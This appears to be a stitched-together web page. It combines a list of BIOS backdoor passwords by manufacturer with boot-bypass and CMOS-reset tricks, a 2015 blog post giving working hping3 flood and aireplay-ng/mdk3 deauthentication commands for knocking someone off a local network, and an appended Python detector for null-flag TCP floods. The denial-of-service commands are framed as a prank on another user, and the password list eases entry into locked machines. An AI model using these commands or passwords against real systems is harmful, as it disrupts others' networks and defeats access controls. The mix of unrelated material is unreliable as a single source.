AMI AAAMMMIII BIOS PASSWORD HEWITT RAND AMI?SW AMI_SW LKWPETER A.M.I. CONDO

PHOENIX BIOS backdoor passwords:

phoenix, PHOENIX, CMOS, BIOS

MISC. COMMON PASSWORDS

ALFAROME BIOSTAR biostar biosstar CMOS cmos LKWPETER lkwpeter setup SETUP Syxz Wodj

OTHER BIOS PASSWORDS BY MANUFACTURER

Manufacturer      Password
VOBIS & IBM       merlin
Dell              Dell
Biostar           Biostar
Compaq            Compaq
Enox              xo11nE
Epox              central
Freetech          Posterie
IWill             iwill
Jetway            spooml
Packard Bell      bell9
QDI               QDI
Siemens           SKY_FOX
TMC               BIGO
Toshiba           Toshiba

TOSHIBA BIOS

Most Toshiba laptops and some desktop systems will bypass the BIOS password if the left shift key is held down during boot

IBM APTIVA BIOS

Press both mouse buttons repeatedly during the boot


--------------------------------------------------------------------------------

Password cracking software

The following software can be used to either crack or reset the BIOS on many chipsets. If your PC is locked with a BIOS administrator password that will not allow access to the floppy drive, these utilities may not work. Also, since these utilities do not come from the manufacturer, use them cautiously and at your own risk.

Cmos password recovery tools 3.1
!BIOS (get the how-to article)
RemPass
KILLCMOS

--------------------------------------------------------------------------------

Using the Motherboard "Clear CMOS" Jumper or Dipswitch settings

Many motherboards feature a set of jumpers or dipswitches that will clear the CMOS and wipe all of the custom settings, including BIOS passwords. The locations of these jumpers/dipswitches vary depending on the motherboard manufacturer, and ideally you should always refer to the motherboard or computer manufacturer's documentation. If the documentation is unavailable, the jumpers/dipswitches can sometimes be found along the edge of the motherboard, next to the CMOS battery, or near the processor. Some manufacturers may label the jumper/dipswitch CLEAR - CLEAR CMOS - CLR - CLRPWD - PASSWD - PASSWORD - PWD. On laptop computers, the dipswitches are usually found under the keyboard or within a compartment at the bottom of the laptop.
Please remember to unplug your PC and use a grounding strap before reaching into your PC and touching the motherboard. Once you locate and reset the jumper switches, turn the computer on and check if the password has been cleared. If it has, turn the computer off and return the jumpers or dipswitches to their original position.


--------------------------------------------------------------------------------

Removing the CMOS Battery

The CMOS settings on most systems are buffered by a small battery that is attached to the motherboard (it looks like a small watch battery). If you unplug the PC and remove the battery for 10-15 minutes, the CMOS may reset itself and the password should be blank (along with any other machine-specific settings, so be sure you are familiar with manually reconfiguring the BIOS settings before you do this). Some manufacturers back up the power to the CMOS chipset by using a capacitor, so if your first attempt fails, leave the battery out (with the system unplugged) for at least 24 hours. Some batteries are actually soldered onto the motherboard, making this task more difficult. Unsoldering the battery incorrectly may damage your motherboard and other components, so please don't attempt this if you are inexperienced. Another option may be to remove the CMOS chip from the motherboard for a period of time.
Note: Removing the battery to reset the CMOS will not work for all PCs, and almost all of the newer laptops store their BIOS passwords in a manner which does not require continuous power, so removing the CMOS battery may not work at all. IBM ThinkPad laptops lock the hard drive as well as the BIOS when the supervisor password is set. If you reset the BIOS password but cannot reset the hard drive password, you may not be able to access the drive, and it will remain locked even if you place it in a new laptop. IBM ThinkPads have special jumper switches on the motherboard, and these should be used to reset the system.


--------------------------------------------------------------------------------

Overloading the KeyBoard Buffer

On some older computer systems, you can force the CMOS to enter its setup screen on boot by overloading the keyboard buffer. This can be done by booting with the keyboard or mouse detached from the system, or on some systems by hitting the Esc key over 100 times in rapid succession.


--------------------------------------------------------------------------------

Jumping the Solder Beads on the CMOS

It is also possible to reset the CMOS by connecting or "jumping" specific solder beads on the chipset. There are too many chipsets to do a breakdown of which points to jump on individual chipsets, and the location of these solder beads can vary by manufacturer, so please check your computer and motherboard documentation for details. This technique is not recommended for the inexperienced and should only be used as a "last ditch" effort.


--------------------------------------------------------------------------------

Using a professional service

If the manufacturer of the laptop or desktop PC can't or won't reset the BIOS password, you still have the option of using a professional service. Password Crackers, Inc., offers a variety of services for desktop and laptop computers for between $100 and $400. For most of these services, you'll need to provide some type of legitimate proof of ownership. This may be difficult if you've acquired the computer second hand or from an online auction.

Tuesday, October 27, 2015

Denial of Service using Hping and aircrack-ng

Denial of Service on internal Network 

I am sure you will hear him say 'WTF is this ISP!'.

1. Hping

hping3 192.168.1.1 -i eth0 --flood -d 65000
HPING 192.168.1.1 (eth0 192.168.1.1): NO FLAGS are set, 40 headers + 65000 data bytes
hping in flood mode, no replies will be shown

2. Our beloved aircrack-ng

aireplay-ng --deauth 1000 -a (BSSID) mon0

3. Same old mdk3

mdk3 <interface> <test_mode> [test_options]
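From the defender's side, the hping3 flood above has a recognisable fingerprint on the wire: a burst of TCP segments with no flags set ("Flags [none]" in tcpdump's output) and oversized payloads from one source. The following detector is an added example, not part of the original post; the tcpdump lines it parses are constructed, and the per-second threshold is an assumed tuning value.

```python
import re
from collections import defaultdict, deque

# Constructed sample of tcpdump's default text output (not a real capture).
# The first six lines mimic an hping3 --flood run: flag-less TCP segments with
# large payloads from 192.168.1.50. The last two lines are ordinary traffic
# (a SYN, and a single stray null segment) that must not raise an alert.
SAMPLE_TCPDUMP = """\
12:00:00.000100 IP 192.168.1.50.2034 > 192.168.1.1.0: Flags [none], win 512, length 65000
12:00:00.000250 IP 192.168.1.50.2035 > 192.168.1.1.0: Flags [none], win 512, length 65000
12:00:00.000400 IP 192.168.1.50.2036 > 192.168.1.1.0: Flags [none], win 512, length 65000
12:00:00.000550 IP 192.168.1.50.2037 > 192.168.1.1.0: Flags [none], win 512, length 65000
12:00:00.000700 IP 192.168.1.50.2038 > 192.168.1.1.0: Flags [none], win 512, length 65000
12:00:00.000850 IP 192.168.1.50.2039 > 192.168.1.1.0: Flags [none], win 512, length 65000
12:00:00.300000 IP 192.168.1.20.51234 > 192.168.1.1.443: Flags [S], seq 1, win 64240, length 0
12:00:00.400000 IP 192.168.1.21.40000 > 192.168.1.1.80: Flags [none], win 512, length 0
"""

# One tcpdump IPv4/TCP line: timestamp, src ip.port, dst ip.port, TCP flags, length.
TCP_LINE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d+) IP (?P<src>\d+\.\d+\.\d+\.\d+)\.\d+ > "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\.\d+: Flags \[(?P<flags>[^\]]*)\].*length (?P<len>\d+)"
)

def parse_ts(ts):
    """Convert HH:MM:SS.ffffff into seconds since midnight."""
    h, m, s = ts.split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)

def detect_null_flood(lines, window=1.0, threshold=5):
    """Return {src: peak_count} for sources that send more than `threshold`
    flag-less TCP segments to a single destination within `window` seconds.
    `threshold` is an assumed tuning value; set it from your own baseline."""
    recent = defaultdict(deque)   # (src, dst) -> timestamps of null-flag segments
    alerts = {}
    for line in lines:
        m = TCP_LINE.match(line)
        if not m or m["flags"] != "none":
            continue              # not TCP, or a normal segment with flags set
        t = parse_ts(m["ts"])
        q = recent[(m["src"], m["dst"])]
        q.append(t)
        while q and t - q[0] > window:   # drop timestamps outside the window
            q.popleft()
        if len(q) > threshold:
            alerts[m["src"]] = max(alerts.get(m["src"], 0), len(q))
    return alerts

if __name__ == "__main__":
    print(detect_null_flood(SAMPLE_TCPDUMP.splitlines()))   # {'192.168.1.50': 6}
```

Feed it live output with `tcpdump -n -l tcp | python3 detector.py`-style piping, or point it at an existing text capture; the deauth flood from step 2 needs a separate 802.11 parser, since those frames never appear as IP traffic.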
